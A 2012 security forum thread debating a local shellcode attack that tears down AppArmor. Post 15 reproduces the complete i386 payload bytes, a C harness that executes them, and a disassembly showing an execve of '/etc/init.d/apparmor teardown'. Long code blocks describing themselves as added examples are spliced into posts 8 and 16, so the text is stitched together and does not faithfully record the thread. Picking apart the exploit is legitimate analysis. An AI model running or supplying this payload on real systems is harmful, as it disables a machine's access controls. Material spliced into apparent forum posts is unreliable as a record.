Attacks against AppArmor

Discussion in 'all things UNIX' started by ComputerSaysNo, Oct 15, 2012.

Thread Status:
Not open for further replies.
  1. ComputerSaysNo

    ComputerSaysNo Registered Member

    Joined:
    Aug 9, 2012
    Posts:
    1,425
    Are there any attacks against AppArmor in the wild?
     
  2. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Not in the wild. Local kernel exploits can defeat apparmor though. LSM isn't meant to restrict kernel processes.
     
  3. PhantomPhenix

    PhantomPhenix Registered Member

    Joined:
    Jul 24, 2010
    Posts:
    29

    -http://1337day.com/exploits/19130
     
  4. chronomatic

    chronomatic Registered Member

    Joined:
    Apr 9, 2009
    Posts:
    1,343
    That's some nice shellcode there. Unfortunately I can't read assembly and I have no idea exactly how it works.
     
  5. PhantomPhenix

    PhantomPhenix Registered Member

    Joined:
    Jul 24, 2010
    Posts:
    29
    -http://lmgtfy.com/?q=Shellcode
     
  6. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    That link won't teach him assembly.
     
  7. BrandiCandi

    BrandiCandi Guest

    I'm guessing that the script is a buffer overflow attempt because of that long string at the beginning "const char sc[] = "\x6a\x0b\x58\x31\blahblahblah" I can't think of any other reason to push such a long string into an assembly stack. But really that's just a guess. It could just be doing simple math for all I know. Assembly is kind of the opposite of pseudo-code.

    I've been trying to run assembly code on an emulator for another project but I can't get it to compile properly. :/

    Because I'm a dork I'll give you some definitions of assembly calls:

    Register   Function
    eax        accumulator
    ebx        base index
    ecx        count
    edx        data
    edi        destination index
    esi        source index
    ebp        frame pointer
    esp        stack top pointer
     
  8. chronomatic

    chronomatic Registered Member

    Joined:
    Apr 9, 2009
    Posts:
    1,343
    I know what shellcode is, bro. I didn't ask for a definition. I said I can't read assembly (which is what shellcode is). Most people don't know assembly (even most developers). For one, assembly depends on the CPU architecture (it will change depending on the hardware). There just aren't that many people who care or have a need to learn it.

    In any case, I ran the exploit by the lead developer of AppArmor. He wasn't impressed. First, it only works on 32-bit and is limited to a specific OS version. And it only works when you're unconfined and the attacker has the ability to utilize the sys_mac_admin capability.

    So if an attacker has user access to your machine, then your AppArmor profiles are incorrect in the first place. And if he has this level of access, there really isn't much reason to tear down AppArmor because AppArmor is only used to confine network-facing apps. If he is already on the machine, then there are a million more exploits he could run besides tearing down AppArmor.

    AppArmor is supposed to stop him from getting local user access in the first place. If you have the proper profiles set up, this attack won't work.
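
    The two preconditions reported above (the calling process is unconfined, and it holds the capability the post calls sys_mac_admin, which the kernel names CAP_MAC_ADMIN, bit 33 of the capability sets) can be checked from userspace before anyone worries about the payload itself. The following is an added example, not code from this thread, the exploit author or the AppArmor project: it parses the text of /proc/<pid>/attr/current (which AppArmor reports as "unconfined" or "<profile> (<mode>)") and the CapEff line of /proc/<pid>/status. The struct and function names are my own, and the label strings used to exercise the parser are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CAP_MAC_ADMIN 33        /* bit number in the kernel's capability sets */

enum aa_state { AA_UNCONFINED, AA_ENFORCE, AA_COMPLAIN, AA_UNKNOWN };

struct aa_label {
    enum aa_state state;
    char profile[128];          /* empty when unconfined */
};

/* Parse the text of /proc/<pid>/attr/current, which AppArmor reports as
 * "unconfined" or "<profile> (<mode>)", e.g. "/usr/sbin/cupsd (enforce)".
 * A trailing newline or spaces are ignored. */
enum aa_state aa_parse_label(const char *line, struct aa_label *out)
{
    size_t n = strlen(line), plen;
    const char *open = NULL;

    while (n && (line[n - 1] == '\n' || line[n - 1] == ' ')) n--;
    out->state = AA_UNKNOWN;
    out->profile[0] = '\0';

    if (n == 0 || (n == 10 && memcmp(line, "unconfined", 10) == 0)) {
        out->state = AA_UNCONFINED;
        return out->state;
    }
    /* split at the last '(' when the label ends in ')' */
    if (line[n - 1] == ')') {
        size_t i;
        for (i = n - 1; i > 0; i--)
            if (line[i] == '(') { open = line + i; break; }
    }
    plen = open ? (size_t)(open - line) : n;
    while (plen && line[plen - 1] == ' ') plen--;
    if (plen >= sizeof out->profile) plen = sizeof out->profile - 1;
    memcpy(out->profile, line, plen);
    out->profile[plen] = '\0';

    if (open) {
        const char *mode = open + 1;
        size_t mlen = (size_t)(line + n - 1 - mode);
        if (mlen == 7 && memcmp(mode, "enforce", 7) == 0)       out->state = AA_ENFORCE;
        else if (mlen == 8 && memcmp(mode, "complain", 8) == 0) out->state = AA_COMPLAIN;
    }
    return out->state;
}

/* From the text of /proc/<pid>/status, return 1 if bit `cap` is set in CapEff,
 * 0 if it is clear, -1 if there is no CapEff line at all. */
int cap_effective(const char *status_text, int cap)
{
    const char *p = strstr(status_text, "CapEff:");
    unsigned long long mask;
    if (!p) return -1;
    mask = strtoull(p + 7, NULL, 16);      /* strtoull skips the tab after the colon */
    return (int)((mask >> cap) & 1ULL);
}

/* The post's two preconditions: unconfined AND CAP_MAC_ADMIN in the effective set. */
int teardown_reachable(const char *attr_current, const char *status_text)
{
    struct aa_label l;
    return aa_parse_label(attr_current, &l) == AA_UNCONFINED
        && cap_effective(status_text, CAP_MAC_ADMIN) == 1;
}

/* Read a procfs file into buf; returns bytes read, -1 on open failure. */
static int read_text(const char *path, char *buf, size_t sz)
{
    FILE *f = fopen(path, "r");
    size_t got;
    if (!f) return -1;
    got = fread(buf, 1, sz - 1, f);
    fclose(f);
    buf[got] = '\0';
    return (int)got;
}

int main(void)
{
    static char cur[256], st[8192];
    struct aa_label l;

    if (read_text("/proc/self/attr/current", cur, sizeof cur) <= 0 ||
        read_text("/proc/self/status", st, sizeof st) <= 0) {
        puts("procfs attributes unavailable (not Linux, or no AppArmor attribute)");
        return 0;
    }
    aa_parse_label(cur, &l);
    printf("label: %s, profile=\"%s\", state=%d\n", cur, l.profile, (int)l.state);
    printf("CAP_MAC_ADMIN effective: %d\n", cap_effective(st, CAP_MAC_ADMIN));
    printf("teardown preconditions met: %d\n", teardown_reachable(cur, st));
    return 0;
}
```

    Run it from a shell confined by a profile and from an unconfined root shell to see the difference: only the latter reports both preconditions met, which is the point the post makes about needing the right profiles in place before this matters.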
     
  9. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    1,985
    Location:
    Canada
    Thank you chronomatic :thumb:
     
  10. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    Architecture dependent. Assuming memory addresses ... well.
    You know how I feel about security science fiction.
    Mrk
     
  11. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    You mean like every shell code ever used.... ever?
     
  12. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    Not sure what you mean by that last sentence.
    Assembly instructions are not shell code, if that's what you infer.
    Mrk
     
  13. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I misunderstood. I meant that asm is always platform dependent. That's what I get for reading on my phone.
     
  14. NGRhodes

    NGRhodes Registered Member

    Joined:
    Jun 23, 2003
    Posts:
    2,331
    Location:
    West Yorkshire, UK

    That shell code is C and takes the string array (which is 80386 opcodes) and executes it inline.
     
  15. BrandiCandi

    BrandiCandi Guest

    Yeah, clearly I have no idea. It's C? Why does it look like assembly?
    Code:
    /* What the payload executes:
     *     /etc/init.d/apparmor teardown
     * i.e. execve("/etc/init.d/apparmor", {"/etc/init.d/apparmor", "teardown", NULL}, NULL)
     * via int 0x80; i386 only, as noted earlier in the thread. */
    const char sc[] = "\x6a\x0b\x58\x31\xd2\x52\x68\x64\x6f\x77\x6e\x68\x74\x65\x61\x72\x89\xe1"
    "\x52\x68\x72\x6d\x6f\x72\x68\x61\x70\x70\x61\x68\x74\x2e\x64\x2f\x68\x2f\x69\x6e\x69\x68\x2f"
    "\x65\x74\x63\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
     
    int main(void)
    {
        int (*shell)(void) = (int (*)(void))sc;   /* treat the bytes as code */
        return shell();   /* only runs where sc[] lands in an executable mapping */
    }
     
    objdump disassembly of the bytes in sc[]:
     
    08048060 <_start>:
    8048060:    6a 0b                    push   $0xb
    8048062:    58                       pop    %eax
    8048063:    31 d2                    xor    %edx,%edx
    8048065:    52                       push   %edx
    8048066:    68 64 6f 77 6e           push   $0x6e776f64
    804806b:    68 74 65 61 72           push   $0x72616574
    8048070:    89 e1                    mov    %esp,%ecx
    8048072:    52                       push   %edx
    8048073:    68 72 6d 6f 72           push   $0x726f6d72
    8048078:    68 61 70 70 61           push   $0x61707061
    804807d:    68 74 2e 64 2f           push   $0x2f642e74
    8048082:    68 2f 69 6e 69           push   $0x696e692f
    8048087:    68 2f 65 74 63           push   $0x6374652f
    804808c:    89 e3                    mov    %esp,%ebx
    804808e:    52                       push   %edx
    804808f:    51                       push   %ecx
    8048090:    53                       push   %ebx
    8048091:    89 e1                    mov    %esp,%ecx
    8048093:    cd 80                    int    $0x80
     
  16. Kerodo

    Kerodo Registered Member

    Joined:
    Oct 5, 2004
    Posts:
    7,786
    It's C with inline assembler as mentioned above. The C code executes the asm code inline as part of a C program.
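
    Rather than execute the bytes to find out what they do, one can decode them. The payload only uses a handful of i386 instructions (push imm8/imm32/reg, pop reg, mov reg,reg, xor reg,reg, int 0x80), so a tiny emulator with a simulated stack is enough to recover the strings it builds and the execve arguments it hands to the kernel. This is an added example, not code from the thread or the exploit's author: the byte string is the one posted above, unchanged; the simulated stack size, the argv limit, and the register/struct names are my choices, and the decoder refuses anything outside that instruction subset rather than guessing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_SIZE 256   /* simulated stack; this payload uses 48 bytes of it */
#define MAX_ARGS   8

/* The byte string from the posted snippet, unchanged. */
static const unsigned char SC[] =
    "\x6a\x0b\x58\x31\xd2\x52\x68\x64\x6f\x77\x6e\x68\x74\x65\x61\x72\x89\xe1"
    "\x52\x68\x72\x6d\x6f\x72\x68\x61\x70\x70\x61\x68\x74\x2e\x64\x2f\x68\x2f\x69\x6e\x69\x68\x2f"
    "\x65\x74\x63\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";

enum { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, NREGS };   /* x86 encoding order */

struct sc_result {
    uint32_t syscall_nr;             /* eax at int 0x80 (11 = execve on i386) */
    int envp_is_null;                /* edx == 0 */
    const char *path;                /* ebx: filename, points into stack[] */
    int argc;
    const char *argv[MAX_ARGS];      /* ecx: NULL-terminated argv, pointers into stack[] */
    unsigned char stack[STACK_SIZE + 1];   /* +1: a guaranteed NUL above the top */
};

static uint32_t rd32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(unsigned char *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Decode `len` bytes of i386 code, executing only the subset this payload uses.
 * Stack "addresses" are offsets into r->stack, so 0 doubles as NULL.
 * Returns 0 when an int 0x80 is reached, -1 on any other opcode or a stack fault. */
int emulate(const unsigned char *code, size_t len, struct sc_result *r)
{
    uint32_t reg[NREGS] = {0};
    unsigned char *stk;
    size_t ip = 0;

    memset(r, 0, sizeof *r);
    stk = r->stack;
    reg[ESP] = STACK_SIZE;

    while (ip < len) {
        unsigned char op = code[ip++];
        uint32_t v;

        if (op == 0x6a || op == 0x68 || (op >= 0x50 && op <= 0x57)) {
            if (op == 0x6a) {                       /* push imm8, sign-extended */
                if (ip + 1 > len) return -1;
                v = (uint32_t)(int32_t)(int8_t)code[ip++];
            } else if (op == 0x68) {                /* push imm32 */
                if (ip + 4 > len) return -1;
                v = rd32(code + ip); ip += 4;
            } else {                                /* push r32 */
                v = reg[op - 0x50];
            }
            if (reg[ESP] < 4) return -1;
            reg[ESP] -= 4;
            wr32(stk + reg[ESP], v);
        } else if (op >= 0x58 && op <= 0x5f) {      /* pop r32 */
            if (reg[ESP] + 4 > STACK_SIZE) return -1;
            reg[op - 0x58] = rd32(stk + reg[ESP]);
            reg[ESP] += 4;
        } else if (op == 0x31 || op == 0x89) {      /* xor r/m32,r32 ; mov r/m32,r32 */
            unsigned char modrm;
            if (ip + 1 > len) return -1;
            modrm = code[ip++];
            if ((modrm >> 6) != 3) return -1;       /* register-direct forms only */
            if (op == 0x31) reg[modrm & 7] ^= reg[(modrm >> 3) & 7];
            else            reg[modrm & 7]  = reg[(modrm >> 3) & 7];
        } else if (op == 0xcd) {                    /* int imm8 */
            uint32_t p;
            if (ip + 1 > len || code[ip++] != 0x80) return -1;
            r->syscall_nr   = reg[EAX];
            r->envp_is_null = (reg[EDX] == 0);
            if (reg[EBX] == 0 || reg[EBX] >= STACK_SIZE) return -1;
            r->path = (const char *)stk + reg[EBX];
            for (p = reg[ECX]; r->argc < MAX_ARGS - 1; p += 4) {
                uint32_t a;
                if (p + 4 > STACK_SIZE) return -1;
                a = rd32(stk + p);
                if (a == 0) break;                  /* argv terminator */
                if (a >= STACK_SIZE) return -1;
                r->argv[r->argc++] = (const char *)stk + a;
            }
            r->argv[r->argc] = NULL;
            return 0;
        } else {
            return -1;                              /* outside the supported subset */
        }
    }
    return -1;                                      /* ran off the end without a syscall */
}

int main(void)
{
    struct sc_result r;
    int i;
    if (emulate(SC, sizeof SC - 1, &r) != 0) {
        puts("unsupported instruction or stack fault");
        return 1;
    }
    printf("syscall %u  path=%s  envp=%s\n", (unsigned)r.syscall_nr, r.path,
           r.envp_is_null ? "NULL" : "non-NULL");
    for (i = 0; i < r.argc; i++)
        printf("argv[%d] = \"%s\"\n", i, r.argv[i]);
    return 0;
}
```

    The "push imm32" values in the disassembly are the four-byte chunks of the two strings written little-endian, which is why they look like numbers there; the emulator simply lays them down on its fake stack in order and reads them back as text. Nothing here runs the payload, so it is safe to use on any host.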
     
  17. ComputerSaysNo

    ComputerSaysNo Registered Member

    Joined:
    Aug 9, 2012
    Posts:
    1,425
    So is it a viable attack or not? How would you defend against it?
     
  18. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    1,985
    Location:
    Canada
    Good question! Once again we see some random smattering of code, unsubstantiated as to how exactly it can deliver its payload from start to finish. Where on earth is a real life example of how this can circumvent the security defense in question?
     
  19. NGRhodes

    NGRhodes Registered Member

    Joined:
    Jun 23, 2003
    Posts:
    2,331
    Location:
    West Yorkshire, UK
    The assembly underneath is just there to show what the ASM code is before it is converted into a string of opcodes, not actually part of the shell code, which is just the string array and main C function (I think that's where you're getting confused :)).
     
  20. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    What do you mean by viable attack?
    For example, rm is a powerful command that can do wonders.
    Does it make it into an attack vector? No.

    But if you run something stupid, you will regret it.
    Defend against what? Do you defend yourself against sharks?

    Mrk
     
  21. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    That one reminded me of something. If "you" really want to protect "yourself" against "sharks", always swim side by side with a killer whale. They will, at least, kill white sharks. Not sure if "you" will be safe from the killer whale itself, though. :D
     
  22. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Can sharks eat me via the internet? If so, holy **** yeah I'm gonna be afraid of sharks.
     
  23. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,699
    The thing is, people are imagining sharks. Like this absolutely trivial, unrelated example that needs local access and depends on a million factors. And then, all of a sudden, it not only becomes an attack, but a viable one, and there's a need to defend from it.

    No. Slow down. Stop. Nothing is happening. Nothing at all.

    Relax. Enjoy your computer and stop creating paranoia.

    I guess ignorance breeds fear. Or perhaps people have suffered so badly in their past they can't shake off the history. What they need though, is the ability to rationalize problems as if dissecting a lab rat. Analytical, precise, with statistical engineering approach, and then, ghosts and imaginary issues go away down the noise pipe.

    Mrk
     
  24. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Sharks are real. Hackers are real. One of them can attack me in the ocean and one can attack me from just about anywhere. Personally I'm a lot more afraid of a shark but it's not keeping me out of the ocean nor is a hacker keeping me offline.

    Yes, risk assessment is important. Whether an attack is viable or not is a very different question from whether an attack is likely or not, i.e. does it work vs. will it happen.

    I don't think calling all attacks imaginary until you've seen it used against a computer is in any way informed or based on analysis. It's just as bad as being worried every time a vulnerability in some software is found.
     
  25. BrandiCandi

    BrandiCandi Guest

    Aha! Yes that had me completely baffled :D Thank you.

    Mr. K, it seems that you're lumping Vulnerability Assessment in with Risk Analysis. It's really incredibly simple:
    1. First you determine what vulnerabilities are present on your system. (Which is what folks are trying to do in this thread)
    2. Then you determine how likely they are to be exploited. (which you seem to be saying isn't likely. So give us FACTS if you know the conditions in which it works. Because it will work somewhere. It's ludicrous to say it doesn't work anywhere.)
    3. Then you defend the stuff that's likely to get attacked. (name a tool that you know will stop it. I'm guessing you have to allow it to execute on your box, so don't let untrusted stuff execute.)
    4. Done.

    Saying that there is no vulnerability when there is one, or asking people to ignore vulnerabilities... well it kinda chaps my little hiney. It's totally irresponsible and misleading.
     